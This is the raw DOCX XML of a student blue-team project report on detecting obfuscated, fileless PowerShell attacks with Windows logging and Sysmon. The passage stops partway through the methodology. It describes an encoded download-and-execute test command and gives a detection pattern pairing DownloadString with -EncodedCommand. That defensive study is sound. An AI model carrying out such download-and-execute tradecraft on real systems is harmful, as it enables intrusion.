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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1143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314450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="260"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIVERSITY OF MINES AND TECHNOLOGY, TARKWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="700" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Department of Computing and Information Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CY376: NETWORK MONITORING, SECURITY AND AUDITING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">End-of-Semester Project Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="500"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring PowerShell and Command-Line Activity for Malicious Use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="500" w:before="150"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Track: Blue Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: Samuel Roland Asahin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Index Number: FCM.41.018.072.23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Programme: BSc. Cybersecurity — Level 300</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B00000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Repository: &lt;insert repo URL before printing&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: 3rd August 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abstract</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell's deep integration into Windows, combined with its ability to execute code directly in memory, has made it one of the most commonly abused Living-off-the-Land (LOLBin) tools in modern intrusions. Because it is trusted by default and rarely produces a file on disk, attacks conducted through it are frequently invisible to signature-based antivirus. This project set out to demonstrate, in a controlled lab environment, how a defender can regain visibility into PowerShell and command-line activity using only native Windows capabilities and Sysmon, without deploying a commercial EDR product.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">A Windows 10 virtual machine was configured with PowerShell Script Block Logging, Module Logging, Transcription, command-line process auditing, and Sysmon (SwiftOnSecurity configuration). A representative obfuscated, fileless attack command — a Base64-encoded, hidden-window PowerShell invocation performing a WebClient download-and-execute — was then executed and hunted for in Windows Event Viewer. The exercise successfully recovered the fully decoded malicious script content from Event ID 4104, and corroborated it with Sysmon Event ID 1 process-creation telemetry, including the executing binary's SHA256 hash and its process lineage. The findings confirm that a small set of free, built-in logging controls can convert an otherwise blind endpoint into one capable of detecting fileless PowerShell attacks, and the report closes with recommendations for hardening this configuration for production SOC use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="15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20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Modern Windows intrusions increasingly avoid dropping malware binaries to disk, instead abusing tools that are already trusted and pre-installed on the target system. This class of technique is commonly referred to as Living-off-the-Land (LOTL), and PowerShell is its most prominent vehicle. Because PowerShell ships by default on every supported version of Windows, is code-signed by Microsoft, and is frequently used for entirely legitimate administration, security tools that rely on file-based signatures or simple process-name blocklists are poorly positioned to detect its misuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">This project investigates that visibility gap from a Blue Team perspective. Rather than treating PowerShell as something to block outright — which would break legitimate administration in most organisations — the objective was to demonstrate that it can be made observable. The project builds a small, single-host detection lab and answers three practical questions: (1) what native Windows logging must be enabled to see obfuscated PowerShell activity at all, (2) what does that activity actually look like once captured, and (3) what additional context, such as Sysmon's process-lineage data, is needed to distinguish a genuinely suspicious execution from routine administrative use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The report is organised as follows. Section 2 reviews the frameworks and tools (MITRE ATT&amp;CK, LOLBAS, NIST SP 800-92, Sysmon, Sigma, and CIS) that informed the lab design. Section 3 describes the lab environment, test design rationale, and the ethical safeguards applied. Section 4 documents every configuration step performed, from Group Policy through to the simulated attack command. Section 5 presents the detection evidence and indicators of compromise obtained. Section 6 analyses what the results mean in practice, including limitations and recommendations for a production deployment. Section 7 concludes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The scope of the project is deliberately narrow and reproducible: a single Windows 10 virtual machine, no Active Directory domain, and no commercial SIEM or EDR product. This mirrors the reality that many organisations — including smaller ones without a dedicated security budget — already own everything needed to detect this class of attack; it is a configuration and process problem as much as a tooling one. The remainder of this report reviews the relevant standards and tooling, documents the lab methodology and configuration steps in full, presents the detection evidence obtained, analyses what it means for a working SOC, and closes with concrete recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Security teams frequently discover, during incident response, that a compromise involving PowerShell went unnoticed for an extended period not because no evidence existed, but because the evidence was never captured in the first place. Default Windows installations do not enable Script Block Logging, module logging, or command-line auditing, and Sysmon is not installed by default at all. An attacker who understands this can operate almost silently on an unhardened endpoint. The problem this project addresses is therefore not "can PowerShell abuse be detected" in the abstract, but the much more concrete and testable question of what specific, freely available configuration changes are required to detect it on a real Windows 10 host, and what the resulting evidence actually looks like to an analyst.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Project Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure native Windows logging (Script Block Logging, Module Logging, Transcription, command-line process auditing) sufficient to capture obfuscated PowerShell activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Install and configure Sysmon to supplement native logging with process-lineage, integrity-level, and hash telemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Design and execute a single, representative simulated attack command that models real-world fileless, obfuscated PowerShell abuse without causing any actual harm or contacting any real external system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Detect and correlate the resulting log evidence across multiple sources to build a complete picture of the simulated attack, including its true intent, its process lineage, and identifying indicators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Translate the findings into concrete, actionable recommendations for hardening a production Windows environment against this class of attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 Real-World Precedent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell-based, fileless tradecraft is not a theoretical concern. Publicly documented intrusion campaigns attributed to a range of threat actors — from commodity malware loaders to nation-state-linked groups tracked under MITRE ATT&amp;CK — have repeatedly used encoded PowerShell one-liners for initial payload staging, precisely because the technique evades naive antivirus while requiring no custom binary to be written or compiled. Industry incident-response reports consistently identify the absence of Script Block Logging as a recurring blind spot during post-incident log review: organisations frequently discover that a compromise involving PowerShell occurred weeks earlier, and that the relevant evidence, had logging been enabled at the time, would have been immediately conclusive. This project's simulated command was designed to reproduce that same class of behaviour — obfuscation plus in-memory execution — specifically so its findings generalise beyond the single test case performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Literature and Tooling Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">A number of established frameworks and tools shaped the approach taken in this project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The MITRE ATT&amp;CK framework catalogues adversary behaviour observed in real-world intrusions. The technique most directly relevant to this project is T1059.001 — Command and Scripting Interpreter: PowerShell — which documents PowerShell's use for execution, discovery, lateral movement, and defence evasion, and lists Script Block Logging and command-line auditing among the primary data sources defenders use to detect it. ATT&amp;CK's sub-technique framing was used to keep the lab's simulated command representative of real adversary behaviour (an obfuscated, memory-only download-and-execute) rather than an artificial test string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 LOLBAS Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The Living Off The Land Binaries and Scripts (LOLBAS) project documents legitimate Windows binaries — PowerShell foremost among them — that can be repurposed for malicious ends. It reinforces a theme central to this report: the binary itself cannot be the detection signal, since it is legitimate; the command line, script content, and behaviour around it must be.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Windows Native Logging Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft's own documentation for about_Logging_Windows and the PowerShell engine describes three complementary logging mechanisms used in this project: Module Logging (Event ID 4103), which records pipeline execution details; Script Block Logging (Event ID 4104), which records the actual, de-obfuscated code executed, including code reconstructed from Base64 or other encodings; and Transcription, which writes a full text transcript of every session to disk. Script Block Logging is the most significant of the three for detecting obfuscated attacks specifically, because PowerShell decodes and logs the content only after its own interpreter has processed it — the attacker's obfuscation is effectively undone for free.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 Sysmon and the SwiftOnSecurity Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">System Monitor (Sysmon), part of the Microsoft Sysinternals suite, extends Windows' native auditing with detailed process-creation, network-connection, and file-creation telemetry, including full parent-child process trees and file hashes. This project used the community-maintained SwiftOnSecurity configuration template, a widely adopted baseline ruleset that filters known-noisy Microsoft and third-party telemetry while preserving high-value security events, reducing the volume problem that raw, unfiltered logging otherwise creates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5 Sigma and SIEM Correlation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">In a production environment the log sources configured in this project would typically be forwarded to a Security Information and Event Management (SIEM) platform such as Splunk, Wazuh, or the ELK stack, where Sigma — a generic, platform-independent rule format for log-based detection — is commonly used to encode conditions such as a 4104 event containing DownloadString together with -EncodedCommand into an automated alert. This project performed that correlation manually inside Event Viewer, but the underlying logic (matching specific fields and flag combinations, not just an event ID) is the same principle a Sigma rule automates at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6 CIS Benchmarks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The CIS Microsoft Windows 10 Benchmark recommends enabling PowerShell Script Block Logging and command-line process creation auditing as baseline hardening controls, independent of any specific attack scenario. The GPO settings configured in Section 4 of this report align directly with those recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7 NIST SP 800-92: Guide to Computer Security Log Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST Special Publication 800-92 establishes the general principle, applied throughout this project, that log management is a lifecycle: generation, collection, storage, analysis, and disposal must all be planned together, not treated as an afterthought once an incident has already occurred. Two of its recommendations are directly reflected in the lab design: that logging should be enabled proactively, before an incident, rather than reactively; and that different log sources should be correlated rather than relied upon individually, since no single source (in this project's case, neither Script Block Logging nor Sysmon alone) tells the complete story.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8 Windows Event Forwarding (WEF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Event Forwarding is Microsoft's built-in mechanism for centralising event logs from many endpoints onto a small number of collector servers, without requiring a third-party agent. Although this project's single-host lab did not implement WEF, it is the natural next step referenced in Section 6.3's recommendations: the same 4104 and Sysmon Operational logs produced locally in this lab would, in a fleet deployment, be forwarded via WEF (or an equivalent lightweight shipper) to a central collector, where a SIEM could apply the Sigma-style correlation performed manually in this report at scale and in real time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.9 Comparing the Available Log Sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1 summarises how the log sources reviewed above complement one another; no single source used alone would have produced the complete picture obtained in Section 5.</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60"/>
      </w:tblGrid>
      <w:t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Log Source</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Captures Decoded Script Content?</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Captures Process Lineage / Hash?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="206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Enabled by Default?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Script Block Logging (4104)</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No</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No</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Process Creation Auditing (4688)</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No (raw command line only)</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Limited (no hash)</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No</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Sysmon (Event ID 1)</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No (raw command line only)</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Yes (full lineage + SHA256)</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No — third-party install</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1 — Comparison of the three Windows log sources used in this project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab was built around a single-host detection pipeline: a Windows 10 virtual machine generates and logs activity locally, and an analyst (the project author) reviews that activity directly in Event Viewer, without an intermediate log-forwarding or SIEM layer. This keeps the project reproducible on a single laptop while still exercising the full detect-and-correlate workflow a SOC analyst performs, only at a smaller scale. Figure 3 summarises the components involved and how evidence flows between them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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098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 Lab architecture: command execution inside the Windows 10 VM, logging via native Event Log and Sysmon, and analyst review in Event Viewer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The methodology followed four stages:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 1 — Baseline hardening: enable PowerShell Script Block Logging, Module Logging, Transcription, and command-line process creation auditing via Local Group Policy (Section 4.1–4.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
